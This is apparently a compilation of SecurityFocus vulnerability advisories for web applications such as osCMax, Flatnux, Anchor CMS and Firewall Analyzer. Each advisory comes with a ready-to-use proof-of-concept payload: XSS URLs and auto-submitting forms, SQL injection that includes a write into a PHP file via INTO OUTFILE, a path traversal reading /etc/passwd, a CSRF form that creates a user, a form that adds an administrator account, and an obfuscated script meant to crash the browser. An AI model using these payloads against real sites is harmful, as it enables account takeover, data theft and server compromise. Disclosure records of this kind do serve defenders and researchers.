HireHackking

source: https://www.securityfocus.com/bid/52807/info eZ Publish is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. eZ Publish 4.6 is vulnerable; other versions may also be affected. http://www.example.com/ezjscore/call<img%20src%3Dlien%20onerror%3Dalert(document.cookie)>/ezjsc:time

source: https://www.securityfocus.com/bid/52821/info e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. e107 1.0.0 is vulnerable; other versions may also be affected. http://www.example.com/index.php?option=com_flexicontent&view=[Sql]

source: https://www.securityfocus.com/bid/52822/info Simple Machines Forum is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Simple Machines Forum 2.0.2 is vulnerable; other versions may also be affected. http://www.example.com/index.php?scheduled=[Xss]

source: https://www.securityfocus.com/bid/52829/info JamWiki is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. JamWiki 1.1.5 is vulnerable; other versions may also be affected. http://www.example.com/jamwiki/en/Special:AllPages?num=[XSS]

source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. http://www.example.com/fw/index2.do?url=adminHome&tab=system%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3El

source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. http://www.example.com.com/fw/createAnomaly.do?subTab=%22%3E%3Cscript%3Ealert%281337%29%3C/script%3EaddAlert&; tab=alert%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E&demoConfigure=true

source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. http://www.example.com/fw/mindex.do?url=%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3EliveReportDash%22%3E %3Cscript%3Ealert%28%27vlab%27%29%3C/script%3E&subTab=%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Elive&tab=%22%3 E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Ereport

source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. http://www.example.com/fw/syslogViewer.do?port=%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E

source: https://www.securityfocus.com/bid/52845/info DirectAdmin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. DirectAdmin 1.403 is vulnerable; other versions may also be affected. http://www.example.com/CMD_DOMAIN?action=create&domain=<div style="border:1px solid red;width:300px;height:300px" onmouseover="alert(dawid)"></div>aaa.pl&ubandwidth=unlimited&uquota=unlimited&cgi=ON&php=ON

source: https://www.securityfocus.com/bid/52846/info Flatnux is prone to multiple security vulnerabilities: 1. An HTML-injection vulnerability 2. A cross-site request-forgery vulnerability 3. A directory-traversal vulnerability Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, obtain sensitive information, or control how the site is rendered to the user. Other attacks are also possible. The following versions are vulnerable: Flatnux 2011-08.09.2 Flatnux 2011-2012-01.03.3 Flatnux 2011-minimal-2012-01.03.3 Fncommerce 2010-08-09-no-db Fncommerce 2010-08-09-no-sample-data Fncommerce 2010-08-09-with-sample-data Fncommerce 2010-12-17-no-db Fncommerce 2010-12-17-no-sample-data Fncommerce 2010-12-17-with-sample-data http://www.example.com/flatnux/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open

source: https://www.securityfocus.com/bid/52846/info Flatnux is prone to multiple security vulnerabilities: 1. An HTML-injection vulnerability 2. A cross-site request-forgery vulnerability 3. A directory-traversal vulnerability Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, obtain sensitive information, or control how the site is rendered to the user. Other attacks are also possible. The following versions are vulnerable: Flatnux 2011-08.09.2 Flatnux 2011-2012-01.03.3 Flatnux 2011-minimal-2012-01.03.3 Fncommerce 2010-08-09-no-db Fncommerce 2010-08-09-no-sample-data Fncommerce 2010-08-09-with-sample-data Fncommerce 2010-12-17-no-db Fncommerce 2010-12-17-no-sample-data Fncommerce 2010-12-17-with-sample-data <html> <form name="test" action="http://www.example.com/flatnux/controlcenter.php?page___xdb_fn_users=1&order___xdb_fn_users=username&desc___xdb_fn_users=&op___xdb_fn_users=insnew&page___ xdb_fn_users=&op=editdata&opt=utilities/xmldb_admin&t=fn_users" method="post"> <input type="hidden" name="username" value="csrf"><br/> <input type="hidden" name="email" value="csrf () hotmail com"><br/> <input type="hidden" name="passwd" value="186911"><br/> <input type="hidden" name="passwd_retype" value="186911"><br/> <input type="hidden" name="name" value="csrf"><br/> <input type="hidden" name="surname" value="Mr"><br/> <input type="hidden" name="link" value="http"><br/> <input type="hidden" name="avatarimage" value=""><br/> <input type="hidden" name="avatar" value=""><br/> <input type="hidden" name="save___xdb_fn_users" value="__xdb_fn_users"><br\> <input type="hidden" name="activ" value=1><br/> </form> <script>document.test.submit();</script> </html>

source: https://www.securityfocus.com/bid/52856/info Flock is prone to a denial-of-service vulnerability. Successful exploits will consume excessive resources and will eventually crash the application and possibly the underlying computer, effectively denying service to legitimate users. Flock 2.6.1 is vulnerable; other versions may also be affected. <script type="text/javascript"> <!-- document.write(unescape('%3c%68%74%6d%6c%3e%0d%0a%3c%74%69%74%6c%65%3e%4f%6f%70%73%20%75%72%20%62%72%6f%77%73%65%72%20%6a%75%73%74%20%64%69%65%64%20%21%21%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%73%63%72%69%70%74%3e%0d%0a%66%75%6e%63%74%69%6f%6e%20%46%54%42%28%29%0d%0a%20%7b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%31%34%31%25%75%34%31%34%31%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%32%34%32%25%75%34%32%34%32%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%33%34%33%25%75%34%33%34%33%22%29%3b%0d%0a%20%20%20%20%76%61%72%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%34%34%34%34%25%75%34%34%34%34%22%29%3b%0d%0a%20%20%20%20%66%6f%72%28%69%3d%30%3b%20%69%20%3c%3d%20%31%30%30%20%3b%20%2b%2b%69%29%0d%0a%20%7b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%3b%0d%0a%20%20%20%20%20%20%20%20%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%2b%3d%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%20%20%20%20%7d%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%31%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%32%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%33%29%3b%0d%0a%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%66%75%63%6b%74%68%65%62%72%6f%77%73%65%72%34%29%3b%0d%0a%7d%0d%0a%3c%2f%73%63%72%69%70%74%3e%0d%0a%3c%2f%68%65%61%64%3e%0d%0a%3c%62%6f%64%79%20%6f%6e%4c%6f%61%64%3d%22%46%54%42%28%29%22%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e')); //--> </script>

source: https://www.securityfocus.com/bid/52881/info Peakflow SP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. https://www.example.com/index/"onmouseover="alert(666)

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. <form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main"> <input type="hidden" name="username" value="'<script>alert(document.cookie);</script>"> <input type="hidden" name="password" value=""> <input type="submit" name="submit" value="Send"> </form>

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/xsell.php?search=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. <form action="http://www.example.com/admin/htaccess.php" method="post" name="main" id="main"> <input type="hidden" name="sb_id" value='"><script>alert(1);</script>'> <input type="hidden" name="sb_key" value='"><script>alert(2);</script>'> <input type="hidden" name="gc_id" value='"><script>alert(3);</script>'> <input type="hidden" name="gc_key" value='"><script>alert(4);</script>'> <input type="hidden" name="path" value='"><script>alert(5);</script>'> <input type="submit" name="submit" value="Send"> </form>

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/stats_products_purchased.php?gross=%22%20%3E%3Cscript%3Ealert%28document.cookie% 29;%3C/script%3E http://www.example.com/admin/stats_products_purchased.php?max=%27%3Cscript%3Ealert%28document.cookie%29;%3C/s cript%3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/stats_customers.php?sorted=%27%3Cscript%3Ealert%28document.cookie%29;%3C/script% 3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/stats_monthly_sales.php?status=%27%3Cscript%3Ealert%28document.cookie%29;%3C/scr ipt%3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/geo_zones.php?action=list&zID=%27%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/information_manager.php?information_action=Edit&information_id=%3Cscript%3Ea lert%28document.cookie%29;%3C/script%3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. <form action="http://www.example.com/admin/login.php?action=process" method="post" name="main" id="main"> <input type="hidden" name="username" value="',1,2,(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))) -- 2"> <input type="hidden" name="password" value=""> <input type="submit" name="submit" value="Send"> </form>

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/new_attributes_include.php?pageTitle=%3Cscript%3Ealert%28document.cookie%29;%3C/ script%3E

source: https://www.securityfocus.com/bid/52886/info osCMax is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. osCMax 2.5.0 is vulnerable; prior versions may also be affected. http://www.example.com/admin/stats_monthly_sales.php?status=0 union select '<? php_code ?>' INTO OUTFILE '../../../path/to/site/file.php'

source: https://www.securityfocus.com/bid/53181/info Anchor CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks may also be possible. Anchor CMS 0.6-14-ga85d0a0 is vulnerable; other versions may also be affected. <html> <title>Anchor CMS v0.6 Multiple Persistent XSS Vulnerabilities</title> <body bgcolor="#000000"> <script type="text/javascript"> function xss0(){document.forms["xss0"].submit();} function xss1(){document.forms["xss1"].submit();} function xss2(){document.forms["xss2"].submit();} function xss3(){document.forms["xss3"].submit();} function xss4(){document.forms["xss4"].submit();} function xss5(){document.forms["xss5"].submit();} </script> <form action="http://www.example.com/anchorcms/index.php/admin/users/login" enctype="application/x-www-form-urlencoded" method="POST" id="xss0"> <input type="hidden" name="user" value='"><script>alert(1);</script>' /> <input type="hidden" name="pass" value="admin" /> </form> <form action="http://www.example.com/anchorcms/index.php/admin/users/amnesia" enctype="application/x-www-form-urlencoded" method="POST" id="xss1"> <input type="hidden" name="email" value='"><script>alert(1);</script>' /> </form> <form action="http://www.example.com/anchorcms/index.php/admin/posts/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss2"> <input type="hidden" name="title" value='"><script>alert(1);</script>' /> <input type="hidden" name="comments" value="1" /> <input type="hidden" name="css" value="" /> <input type="hidden" name="description" value="ZSL" /> <input type="hidden" name="html" value="1" /> <input type="hidden" name="js" value="" /> <input type="hidden" name="slug" value='"><script>alert(2);</script>' /> <input type="hidden" name="status" value="published" /> </form> <form action="http://www.example.com/anchorcms/index.php/admin/pages/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss3"> <input type="hidden" name="name" value='"><script>alert(1);</script>' /> <input type="hidden" name="title" value='"><script>alert(2);</script>' /> <input type="hidden" name="content" value="Zero Science Lab" /> <input type="hidden" name="slug" value="ZSL" /> <input type="hidden" name="status" value="published" /> </form> <form action="http://www.example.com/anchorcms/index.php/admin/users/add" enctype="application/x-www-form-urlencoded" method="POST" id="xss4"> <input type="hidden" name="real_name" value='"><script>alert(1);</script>' /> <input type="hidden" name="bio" value="MK" /> <input type="hidden" name="email" value='"><script>alert(3);</script>' /> <input type="hidden" name="password" value="admin" /> <input type="hidden" name="role" value="administrator" /> <input type="hidden" name="status" value="active" /> <input type="hidden" name="username" value='"><script>alert(2);</script>' /> </form> <form action="http://www.example.com/anchorcms/index.php/admin/metadata" enctype="application/x-www-form-urlencoded" method="POST" id="xss5"> <input type="hidden" name="auto_published_comments" value="1" /> <input type="hidden" name="description" value='"><script>alert(1);</script>' /> <input type="hidden" name="home_page" value="1" /> <input type="hidden" name="posts_page" value="1" /> <input type="hidden" name="posts_per_page" value="1" /> <input type="hidden" name="save" value="" /> <input type="hidden" name="sitename" value='"><script>alert(2);</script>' /> <input type="hidden" name="theme" value="default" /> <input type="hidden" name="twitter" value='"><script>alert(3);</script>' /> </form> <br /><br /> <a href="javascript: xss0();" style="text-decoration:none"> <b><font color="red"><h3>XSS 0</h3></font></b></a><br /> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><h3>XSS 1</h3></font></b></a><br /> <a href="javascript: xss2();" style="text-decoration:none"> <b><font color="red"><h3>XSS 2</h3></font></b></a><br /> <a href="javascript: xss3();" style="text-decoration:none"> <b><font color="red"><h3>XSS 3</h3></font></b></a><br /> <a href="javascript: xss4();" style="text-decoration:none"> <b><font color="red"><h3>XSS 4</h3></font></b></a><br /> <a href="javascript: xss5();" style="text-decoration:none"> <b><font color="red"><h3>XSS 5</h3></font></b></a><br /> <a href='http://www.example.com/anchorcms/index.php/"><script>alert(1);</script>'>XSS 6</a> </body></html>